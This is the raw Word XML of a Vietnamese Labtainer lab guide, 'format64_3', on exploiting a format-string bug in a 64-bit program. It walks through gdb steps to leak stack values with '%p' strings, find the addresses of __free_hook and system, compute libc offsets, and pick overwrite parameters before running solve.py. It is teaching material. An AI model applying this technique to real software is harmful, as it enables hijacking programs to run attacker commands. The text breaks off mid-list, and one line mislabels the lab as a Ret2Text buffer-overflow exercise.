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DD83" w14:textId="59E8B70C" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t xml:space="preserve">Format String: 64 bit application </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346DB7C4" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t>1. Tổng quan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702FB77C" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t xml:space="preserve">Lab này bao gồm mã nguồn của chương trình lỗi được biên dịch và chạy dưới kiến trúc 64-bit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719F15B7" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Yêu cầu đối với sinh viên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F110F7A" w14:textId="25A77CAF" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t>Sinh viên cần có kỹ năng sử dụng câu lệnh linux, hiểu biết thức nhất định về lập trình ngôn ngữ bậc thấp, biết sử dụng python phục vụ mục đích viết payload, hiểu được cơ bản về cách thức hoạt động của lỗi format string</w:t>
      </w:r>
      <w:r>
        <w:t>, hoàn thành lab format64_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8BC137" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Môi trường lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28804B99" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t>Từ thư mục labtainer-student bắt đầu bài lab bằng câu lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE106A5" w14:textId="0C1CB05C" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14B54">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>abtainer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -r</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14B54">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>format64_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC8CE85" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t>Sinh viên sẽ được cung cấp 3 container, trong đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A79158" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t xml:space="preserve">+ Container attacker: chạy 2 terminal, chứa binary của service chạy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587FAC51" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t>+ Container ghidra: chạy 1 terminal, chứa binary của service chạy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350286FA" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRPr="00E14B54" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t xml:space="preserve">+ Container server: chạy ẩn binary của service </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D00FFB5" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5EA941" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t>Mục đích bài lab: Giúp sinh viên hiểu được về kỹ thuật tấn công buffer overflow Ret2Text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C900F09" w14:textId="5B350E3B" w:rsidR="00723B6E" w:rsidRDefault="00F4723E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Trigger bug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9D9FBD" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t xml:space="preserve">Mục đích: Tìm được index trỏ đến đầu buffer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3305FCD6" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t xml:space="preserve">Các bước thực hiện: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C17C28" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện debug tiến trình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C4B8EA" w14:textId="6602C5AB" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>gdb format64_</w:t>
      </w:r>
      <w:r w:rsidR="00F4723E">
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F6AD32" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Chạy chương trình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775F15E0" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D733DB" w14:textId="3B311C25" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tiến hành tạo một khối với nội dung </w:t>
      </w:r>
      <w:r w:rsidR="00F4723E">
        <w:t>chứa chuỗi format string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BED073C" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3B8F38" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Index = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF22C17" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Size = 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7792328A" w14:textId="026314F8" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Content =</w:t>
      </w:r>
      <w:r w:rsidR="00F4723E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F4723E">
        <w:t>%p%p%p%p%p%p%p%p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA9BD36" w14:textId="68E7C06E" w:rsidR="00723B6E" w:rsidRDefault="00F4723E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>In ra khối đó để trigger bug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CC9BCF" w14:textId="097CE4BD" w:rsidR="00723B6E" w:rsidRDefault="00F4723E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148209DA" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Index = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F29FDD" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Output sẽ in ra giá trị trên stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EB93A2" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tìm phần tử %p tương ứng khi thấy bắt đầu có sự lặp lại các giá trị in ra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8BB074" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sử dụng Ctrl-C để thoát tiến trình debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFD1CB2" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E"/>
    <w:p w14:paraId="3542A83D" w14:textId="57ABBE6B" w:rsidR="00723B6E" w:rsidRDefault="00F4723E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Find free</w:t>
      </w:r>
      <w:r w:rsidR="00786493">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>hook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593D0240" w14:textId="40755524" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t xml:space="preserve">Mục đích: </w:t>
      </w:r>
      <w:r w:rsidR="00F4723E">
        <w:t>Tìm được địa chỉ hàm free_hook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148C4624" w14:textId="4E51FC7E" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t xml:space="preserve">Các bước thực hiện:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A505E77" w14:textId="2443B8ED" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mở lại tiến trình debug:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551A2680" w14:textId="3A6053AB" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>gdb format64_3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C768A2F" w14:textId="40D9C9B2" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện đặt breakpoint tại main:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1B8C66" w14:textId="5B639385" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>b main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161F3CCC" w14:textId="5A3D33CB" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Chạy chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEEEF1C" w14:textId="09B687B2" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363BEBC4" w14:textId="31FD9976" w:rsidR="00723B6E" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện chạy lệnh in địa chỉ để in ra địa chỉ của __free_hook:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F51C5B" w14:textId="65641A0E" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>print &amp;__free_hook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6727FD52" w14:textId="3E8AE242" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lưu địa chỉ này lại để tính offset của __free_hook so với libc base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D09439" w14:textId="0CE4F5EF" w:rsidR="00723B6E" w:rsidRDefault="00F4723E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Find system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D31643" w14:textId="1EBB6E7E" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t xml:space="preserve">Mục đích: </w:t>
      </w:r>
      <w:r w:rsidR="00F4723E">
        <w:t>Tìm được địa chỉ hàm</w:t>
      </w:r>
      <w:r w:rsidR="00F4723E">
        <w:t xml:space="preserve"> system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BE2D98" w14:textId="77777777" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:r>
        <w:t xml:space="preserve">Các bước thực hiện:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE7D33F" w14:textId="6E359288" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực hiện chạy lệnh in địa chỉ để in ra địa chỉ của </w:t>
      </w:r>
      <w:r>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479FE61D" w14:textId="16AEAC05" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>rint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4BB249" w14:textId="28BDD77F" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lưu địa chỉ này lại để tính offset của system so với libc base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4E3BA" w14:textId="28E8FDE4" w:rsidR="00723B6E" w:rsidRDefault="00F4723E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>VMMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D60CB47" w14:textId="3A2E47B1" w:rsidR="00F4723E" w:rsidRDefault="00F4723E" w:rsidP="00F4723E">
      <w:r>
        <w:t xml:space="preserve">Mục đích: Tìm được </w:t>
      </w:r>
      <w:r w:rsidR="00786493">
        <w:t>offset của địa chỉ leak, offset system và offset free_hook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55632627" w14:textId="77777777" w:rsidR="00F4723E" w:rsidRDefault="00F4723E" w:rsidP="00F4723E">
      <w:r>
        <w:t>Các bước thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BB8B52" w14:textId="77777777" w:rsidR="00F4723E" w:rsidRDefault="00F4723E" w:rsidP="00F4723E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tại cửa số đang debug thực hiện câu lệnh vmmap để in ra thông tin phân vùng bộ nhớ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DCAADF" w14:textId="77777777" w:rsidR="00F4723E" w:rsidRDefault="00F4723E" w:rsidP="00F4723E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vmmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C93FDEF" w14:textId="77777777" w:rsidR="00F4723E" w:rsidRDefault="00F4723E" w:rsidP="00F4723E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Địa chỉ ở cột start tại dòng đầu tiên trỏ tới libc là địa chỉ base của libc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8524A6" w14:textId="4FBF42BD" w:rsidR="00723B6E" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tính địa chỉ offset của system và free_hook bằng cách lấy 2 địa chỉ ở trên tìm được sau đó trừ đi địa chỉ libc_base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DBEDD7" w14:textId="6839C911" w:rsidR="00723B6E" w:rsidRDefault="00F4723E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Overwrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1125EA73" w14:textId="76A001CF" w:rsidR="00786493" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t xml:space="preserve">Mục đích: Tìm được </w:t>
      </w:r>
      <w:r w:rsidR="00786493">
        <w:t>param thích hợp để tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2594706B" w14:textId="73725FB4" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t>Các bước thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CE5FD3" w14:textId="7105E9C4" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gõ stack và ấn enter thêm vài lần để hiện thêm thông tin của stack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE5FF77" w14:textId="4DBE8345" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BEC8CF" w14:textId="1656DFC4" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tìm ô địa chỉ sao cho ô địa chỉ đó chứa giá trị là một danh sách liên kết đơn có ít nhất 2 node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD33202" w14:textId="0EE011A2" w:rsidR="00786493" w:rsidRDefault="00B05DCE" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Địa chỉ của ô đó và địa chỉ của ô mà nó chứa là 2 địa chỉ cần</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45113D22" w14:textId="311C832E" w:rsidR="00B05DCE" w:rsidRDefault="00B05DCE" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Xác định 2 ô địa chỉ đó là phần tử %p thứ bao nhiêu 2 số đó sẽ lần lượt là param1 và param2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE14657" w14:textId="6FA1E38F" w:rsidR="002A433D" w:rsidRDefault="002A433D" w:rsidP="00786493">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sau khi hoàn thiện payload tiến hành chạy một cửa sổ pwnserver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A3DDA9" w14:textId="23FE5119" w:rsidR="002A433D" w:rsidRDefault="002A433D" w:rsidP="002A433D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>./gdbpwnserver.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E79FECD" w14:textId="3BDA2DA0" w:rsidR="002A433D" w:rsidRDefault="002A433D" w:rsidP="002A433D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Và một cửa sổ chạy file khai thác (local):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1528FE" w14:textId="6EDA4538" w:rsidR="002A433D" w:rsidRDefault="002A433D" w:rsidP="002A433D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>python3.8 solve.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469E5F71" w14:textId="702A2E06" w:rsidR="002A433D" w:rsidRDefault="002837C5" w:rsidP="002A433D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Đặt breakpoint lại show:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3495B7" w14:textId="4882FE22" w:rsidR="002837C5" w:rsidRDefault="002837C5" w:rsidP="002837C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>b *show+224</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645C327F" w14:textId="59ED824B" w:rsidR="00483EB8" w:rsidRDefault="00483EB8" w:rsidP="00483EB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sau đó tiếp tục, lúc này bên cửa sổ chạy payload bấm phím bất kì để tiếp tục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AC6A1D" w14:textId="3D8A30D3" w:rsidR="00483EB8" w:rsidRDefault="00483EB8" w:rsidP="00483EB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
